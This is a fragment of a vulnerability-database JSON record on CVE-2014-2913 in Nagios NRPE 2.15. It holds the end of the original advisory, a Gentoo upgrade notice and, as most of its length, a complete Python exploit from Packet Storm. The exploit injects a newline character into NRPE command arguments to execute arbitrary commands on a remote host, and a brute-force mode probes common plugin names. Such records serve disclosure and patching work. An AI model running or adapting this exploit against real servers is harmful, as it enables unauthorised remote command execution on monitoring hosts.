access from a trusted \r\nnagios server.\r\nInstall updated version of NRPE when it becomes available.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://www.nagios.org\r\nhttp://sourceforge.net/projects/nagios/files/nrpe-2.x/\r\nhttp://exchange.nagios.org/directory/Addons/Monitoring-Agents/NRPE--2D-Nagios-Remote-Plugin-Executor/details\r\nhttp://legalhackers.com/advisories/nagios-nrpe.txt \r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\nApril 17th, 2014: Advisory created\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32925/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:36", "bulletinFamily": "exploit", "description": "", "modified": "2014-08-28T00:00:00", "published": "2014-08-28T00:00:00", "href": "https://packetstormsecurity.com/files/128038/NRPE-2.15-Remote-Command-Execution.html", "id": "PACKETSTORM:128038", "type": "packetstorm", "title": "NRPE 2.15 Remote Command Execution", "sourceData": "`#!/usr/bin/python \n# \n# \n# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability \n# \n# Discovered by : Dawid Golunski \n# dawid (at) legalhackers (dot) com \n# legalhackers.com \n# \n# Exploit Author : Claudio Viviani \n# http://www.homelab.it \n# \n# info@homelab.it \n# homelabit@protonmail.ch \n# \n# https://www.facebook.com/homelabit \n# https://twitter.com/homelabit \n# https://plus.google.com/+HomelabIt1/ \n# https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n# \n# \n# \n# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org> \n# http://www.abcompcons.com/files/nrpe_client.py \n# \n# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/) \n# \n# [root@localhost ~]# pip-python install pyOpenSSL \n# \n# NRPE <= 2.15 Remote Command Execution Vulnerability \n# Release date: 17.04.2014 \n# Discovered by: Dawid Golunski \n# Severity: High \n# CVE-2014-2913 \n# \n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913 \n# http://www.exploit-db.com/exploits/32925/ \n# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA) \n# \n# Tested on CentOS 5.x, CentOS 6.x, BacBox 3.x, KaliLinux 1.0.6 with Python 2.x \n# \n# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE \n# \n \nimport OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/ \nimport optparse \nimport os \nimport signal \nimport socket \nimport struct \nimport sys \nimport time \n \nbanner = \"\"\" \n \n$$\\ $$\\ $$$$$$$\\ $$$$$$$\\ $$$$$$$$\\ $$$$$$\\ $$\\ $$$$$$$\\\\ \n$$$\\ $$ |$$ __$$\\ $$ __$$\\ $$ _____| $$ __$$\\ $$$$ | $$ ____| \n$$$$\\ $$ |$$ | $$ |$$ | $$ |$$ | \\__/ $$ | \\_$$ | $$ | \n$$ $$\\$$ |$$$$$$$ |$$$$$$$ |$$$$$\\ $$$$$$ | $$ | $$$$$$$\\\\ \n$$ \\$$$$ |$$ __$$< $$ ____/ $$ __| $$ ____/ $$ | \\_____$$\\\\ \n$$ |\\$$$ |$$ | $$ |$$ | $$ | $$ | $$ | $$\\ $$ | \n$$ | \\$$ |$$ | $$ |$$ | $$$$$$$$\\ $$$$$$$$\\ $$\\ $$$$$$\\\\$$$$$$ | \n\\__| \\__|\\__| \\__|\\__| \\________| \\________|\\__|\\______|\\______/ \n \n \n \n$$$$$$$\\ $$$$$$\\ $$$$$$$$\\\\ \n$$ __$$\\ $$ __$$\\ $$ _____| \n$$ | $$ |$$ / \\__|$$ | \n$$$$$$$ |$$ | $$$$$\\\\ \n$$ __$$< $$ | $$ __| \n$$ | $$ |$$ | $$\\ $$ | \n$$ | $$ |\\$$$$$$ |$$$$$$$$\\\\ \n\\__| \\__| \\______/ \\________| \nNRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n \n \n \n============================================= \n- Release date: 17.04.2014 \n- Discovered by: Dawid Golunski \n- Severity: High \n- CVE: 2014-2913 \n============================================= \n \nWritten by: \n \nClaudio Viviani \n \nhttp://www.homelab.it \n \ninfo@homelab.it \nhomelabit@protonmail.ch \n \nhttps://www.facebook.com/homelabit \nhttps://twitter.com/homelabit \nhttps://plus.google.com/+HomelabIt1/ \nhttps://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww \n \n\"\"\" \n# Plugin list for Brute force mode \nPluginList = ['check_all', \n'check_apt', \n'check_bdii', \n'check_bonding', \n'check_breeze', \n'check_by_ssh', \n'check_check-updates', \n'check_check_sip', \n'check_cluster', \n'check_dhcp', \n'check_dig', \n'check_disk', \n'check_disk_smb', \n'check_dns', \n'check_dpm-disk', \n'check_dpm-head', \n'check_dummy', \n'check_file_age', \n'check_flexlm', \n'check_fping', \n'check_game', \n'check_hpjd', \n'check_http', \n'check_icmp', \n'check_ide_smart', \n'check_ifoperstatus', \n'check_ifstatus', \n'check_ircd', \n'check_lcgdm', \n'check_lcgdm-common', \n'check_ldap', \n'check_lfc', \n'check_linux_raid', \n'check_load', \n'check_log', \n'check_mailq', \n'check_mrtg', \n'check_mrtgtraf', \n'check_mysql', \n'check_nagios', \n'check_nrpe', \n'check_nt', \n'check_ntp', \n'check_nwstat', \n'check_openmanage', \n'check_oracle', \n'check_overcr', \n'check_perl', \n'check_pgsql', \n'check_ping', \n'check_procs', \n'check_radius', \n'check_real', \n'check_rhev', \n'check_rpc', \n'check_sensors', \n'check_smtp', \n'check_snmp', \n'check_ssh', \n'check_swap', \n'check_tcp', \n'check_time', \n'check_ups', \n'check_users', \n'check_wave'] \n \n \n \n# nrpe 2.15 skip chars \"|`&><'\\\"\\\\[]{};\" and \"$()\" but not \"\\x0a\"(new line) \nevilchar = \"\\x0a\" \n \nQUERY_PACKET = 1 \nRESPONSE_PACKET = 2 \n \nNRPE_PACKET_VERSION_2 = 2 \n \n# max amount of data we'll send in one query/response \nMAX_PACKETBUFFER_LENGTH = 1024 \n \n \n#def debug(sMessage): \n# \"\"\"Send a string to STDERR\"\"\" \n# if DEBUG: \n# sys.stderr.write(\"%s\\n\" % sMessage) \n \nclass DataPacket: \n\"\"\"A Python implementation of the C struct, packet.\"\"\" \ndef __init__(self, packet_version, packet_type): \nself.nPacketVersion = packet_version # int16 \nself.nPacketType = packet_type # int16 \nself.nCRC32 = 0 # u_int32 \nself.nResultCode = 2324 # int16 \nself.sData = '' \nself.tCRC32 = ( \n0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, \n0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, \n0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, \n0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, \n0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, \n0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, \n0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, \n0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, \n0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, \n0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, \n0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, \n0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, \n0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, \n0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, \n0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, \n0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, \n0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, \n0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, \n0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, \n0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, \n0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, \n0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, \n0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, \n0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, \n0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, \n0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, \n0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, \n0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, \n0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, \n0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, \n0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, \n0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, \n0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, \n0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, \n0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, \n0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, \n0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, \n0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, \n0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, \n0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, \n0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, \n0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, \n0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, \n0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, \n0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, \n0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, \n0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, \n0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, \n0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, \n0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, \n0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, \n0x2d02ef8d) \n \ndef __str__(self): \n# Turn whatever string data we have into a null terminated string \nif len(self.sData) < MAX_PACKETBUFFER_LENGTH: \nsData = self.sData + \"\\0\" * (MAX_PACKETBUFFER_LENGTH - len(self.sData)) \nsData += \"SR\" # not sure about this, from perl \nelif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2: \nsData = self.sData \nelse: \nraise ValueError(\"CHECK_NRPE: invalid input\") \n# Return a string that equals the C struct, not something printable \nreturn struct.pack(\"!hhLh\" + str(len(sData)) + \"s\", self.nPacketVersion, \nself.nPacketType, self.nCRC32, self.nResultCode, sData) \n \ndef __len__(self): \nreturn len(self.__str__()) \n \ndef dumpself(self): \n\"\"\"Debugging output for self as C structure. \n \nNot normally used.\"\"\" \nsElf = self.__str__() \nsPrev = sElf[0:1] \nnCount = 0 \nii = -1 \nfor sChar in sElf[1:]: \nii += 1 \nif sChar == sPrev: \nnCount += 1 \ncontinue \nif nCount: \nprint \"%d\\t%d *\" % (ii - nCount, nCount + 1), \nnCount = 0 \nelse: \nprint \"%d\\t\" % ii, \nprint \"\\t'%s' (%d)\" % (sPrev, ord(sPrev)) \nsPrev = sChar \nprint \"%d\\t\\t'%s' (%d)\" % (ii + 1, sPrev, ord(sPrev)) \n \ndef calculate_crc32(self): \n\"\"\"Calculate the CRC32 value for the string version of self.\"\"\" \nnCRC = 0xFFFFFFFF \nfor ii in self.__str__(): \nnIndex = (nCRC ^ ord(ii)) & 0xFF \nnCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex] \nself.nCRC32 = nCRC ^ 0xFFFFFFFF \n#debug(\"DataPacket.calculate_crc32 = %d\" % self.nCRC32) \n \ndef extract(self, sQuery): \n\"\"\"Turn a string into the DataPacket attributes.\"\"\" \n#debug(\"DataPacket.extract(%d)\" % len(sQuery)) \ntVals = struct.unpack(\"!hhLh\" + str(len(sQuery) - 10) + \"s\", sQuery) \nself.nPacketVersion = tVals[0] \nself.nPacketType = tVals[1] \nself.nCRC32 = tVals[2] \nself.nResultCode = tVals[3] \nself.sData = tVals[4] \n \nm_nTimeout = 0 \ndef alarm_handler(nSignum, oFrame): \n\"\"\"Timeout catcher\"\"\" \nraise KeyboardInterrupt(\"CHECK_NRPE: Socket timeout after %d seconds.\" % \nm_nTimeout) \n \n \nclass NrpeClient(DataPacket): \n\"\"\"Everything needed to send a message to an NRPE server and get data back. \n\"\"\" \ndef __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10, \npacket_version=NRPE_PACKET_VERSION_2): \nDataPacket.__init__(self, packet_version, QUERY_PACKET) \nself.sServer = server_name \nself.nPort = server_port \nself.bUseSSL = use_ssl \nself.nTimeout = timeout \n \ndef run_query(self, sQuery): \n\"\"\"Connect to the NRPE server, send the query and get back data. \n\"\"\" \n# initialize alarm signal handling and set timeout \nsignal.signal(signal.SIGALRM, alarm_handler) \nsignal.alarm(self.nTimeout) \n \n# try to connect to the host at the given port number \noSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n# do SSL handshake \nif self.bUseSSL: \noContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD) \noContext.set_cipher_list('ADH') \noConnection = OpenSSL.SSL.Connection(oContext, oSocket) \nelse: \noConnection = oSocket \n \noConnection.connect((self.sServer, self.nPort)) \n \n# we're connected and ready to go \nself.sData = sQuery \nself.nCRC32 = 0 \nself.calculate_crc32() \n \n# send the packet \noConnection.send(str(self)) \n \n# wait for the response packet \nsRval = oConnection.recv(len(self)) \n \n# close the connection \nif self.bUseSSL and not oConnection.shutdown(): \ntry: \nsRval += oConnection.recv(len(self)) \nexcept OpenSSL.SSL.ZeroReturnError: \npass \noSocket.close() \ndel oSocket, oConnection \nif self.bUseSSL: \ndel oContext \n \n# reset timeout \nsignal.alarm(0) \n \nif len(sRval) == 0: \nraise IOError(\"CHECK_NRPE: Received 0 bytes from daemon.\" + \n\"Check the remote server logs for error messages.\") \nelif len(sRval) < len(self): \nraise IOError(\"CHECK_NRPE: Receive underflow - only \" + \n\"%d bytes received (%d expected).\" % (len(sRval), len(self))) \n \n# Become the received data \nself.extract(sRval) \n \n# check the crc 32 value \nnRvalCRC = self.nCRC32 \nself.nCRC32 = 0 \nself.calculate_crc32() \nif nRvalCRC != self.nCRC32: \nraise ValueError(\"CHECK_NRPE: Response packet had invalid CRC32.\") \n \n# check packet version \nif self.nPacketVersion != NRPE_PACKET_VERSION_2: \nraise ValueError(\"CHECK_NRPE: Invalid packet version received from server.\") \n \n# check packet type \nif self.nPacketType != RESPONSE_PACKET: \nraise ValueError(\"CHECK_NRPE: Invalid packet type received from server.\") \n \n# Turn the input data into a proper python string (chop at first NULL) \nfor ii in range(len(self.sData)): \nif self.sData[ii] == \"\\0\": \nbreak \nself.sData = self.sData[0:ii] \n \n \nif __name__ == '__main__': \nm_oOpts = optparse.OptionParser(\"%prog -H Host_or_IP -c nrpe_command --cmd=\\\"command to execute\\\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]\") \nm_oOpts.add_option('--host', '-H', action='store', type='string', \nhelp='The address of the host running the NRPE daemon (required)') \nm_oOpts.add_option('--ssl', '-n', action='store_false', default=True, \nhelp='Do no use SSL') \nm_oOpts.add_option('--port', '-p', action='store', type='int', default=5666, \nhelp='The port on which the daemon is running (default=5666)') \nm_oOpts.add_option('--timeout', '-t', action='store', type='int', \ndefault=10, \nhelp='Number of seconds before connection times out (default=10)') \nm_oOpts.add_option('--command', '-c', action='store', type='string', \n#default='get_data', \nhelp='The name of nrpe command') \nm_oOpts.add_option('--brute', '-b', action='store_true', default=False, \nhelp='Find existing nrpe command from list [ -list ]') \nm_oOpts.add_option('--list', action='store_true', default=False, \nhelp='Show NRPE Command list') \nm_oOpts.add_option('--cmd', action='store', type='string', \nhelp='Command to execute on the remote server') \n \nm_oOptions, m_lArgs = m_oOpts.parse_args() \nm_nTimeout = m_oOptions.timeout \nm_sQuery = m_oOptions.command \nm_gList = m_oOptions.list \nm_sBrute = m_oOptions.brute \n \nprint (banner) \n \nif m_gList: \nprint('[+] NRPE Command list\\n') \nfor LinesPluginList in PluginList: \nprint(LinesPluginList) \nsys.exit(0) \nelif m_sQuery and m_sBrute: \nprint m_oOpts.format_help() \nprint('[!]') \nprint('[!] ERROR: Select only -c OR -b option\\n') \nsys.exit(0) \nelif not m_oOptions.host or not m_oOptions.cmd: \nprint m_oOpts.format_help() \nsys.exit(0) \n \nprint('[+] Target: '+m_oOptions.host) \nprint('[+] Command: '+m_oOptions.cmd+' \\n') \n \nif m_sBrute: \nprint('[+] Brute force Mode....') \nprint('[+]') \nfor LinesPluginList in PluginList: \n \nm_CommandQuery = \"\" \nm_CommandQuery += ' ' + m_oOptions.cmd \nif m_lArgs: \nm_CommandQuery += ' ' + ' '.join(m_lArgs) \n \nm_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #' \n \n \nm_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl, \nm_oOptions.timeout) \ntry: \nm_oNRPE.run_query(m_sQuery) \nexcept socket.error: \nprint('[!] Connection Error!') \nsys.exit(1) \nexcept OpenSSL.SSL.ZeroReturnError: \nprint('[!] Not Vulnerable') \nprint('[!] Option dont_blame_nrpe disabled or service fixed') \nsys.exit(1) \n \nif m_oNRPE.sData[-11:] == \"not defined\": \nprint('[-] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tnot found') \nelse: \nprint('[+] Checking for NRPE command '+LinesPluginList+':\\t\\t\\tVULNERABLE!') \nprint('[+]') \nprint('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)') \nprint('[+]') \nprint('[+] Please ignore NRPE plugin command messages (Usage or Errors)') \nprint('[+]') \nprint(m_oNRPE.sData) \nsys.exit(0) \nelif m_sQuery: \nprint('[+] Custom command Mode....') \nprint('[+]') \nprint('[+] Connecting......') \n \nm_CommandQuery = \"\" \nm_CommandQuery += ' ' + m_oOptions.cmd \nif m_lArgs: \nm_CommandQuery += ' ' + ' '.join(m_lArgs) \n \nm_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #' \n \nm_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl, \nm_oOptions.timeout) \ntry: \nm_oNRPE.run_query(m_sQuery) \nexcept KeyboardInterrupt: \nprint(\"[!] CHECK_NRPE: Socket timeout after %d seconds.\" % m_nTimeout) \nsys.exit(1) \nexcept socket.error: \nprint('[!] Connection Error!') \nsys.exit(1) \nexcept OpenSSL.SSL.ZeroReturnError: \nprint('[!] Not Vulnerable') \nprint('[!] Option dont_blame_nrpe disabled or service fixed') \nsys.exit(1) \n \nif m_oNRPE.sData[-11:] == \"not defined\": \nprint('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command') \nelse: \nprint('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!') \nprint('[+]') \nprint('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)') \nprint('[+]') \nprint('[+] Please ignore NRPE plugin command messages (Usage or Errors)') \nprint('[+]') \nprint(m_oNRPE.sData) \nsys.exit(0) \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128038/nrpe_215_rce_exploit.txt"}], "gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "description": "### Background\n\nNagios Remote Plugin Executor (NRPE) remotely executes Nagios plugins on other Linux/Unix machines. \n\n### Description\n\nMultiple vulnerabilities have been discovered in NRPE. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can utilize multiple vectors to execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll NRPE users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/nrpe-2.15\"", "modified": "2014-08-30T00:00:00", "published": "2014-08-30T00:00:00", "id": "GLSA-201408-18", "href": "https://security.gentoo.org/glsa/201408-18", "type": "gentoo", "title": "NRPE: Multiple Vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}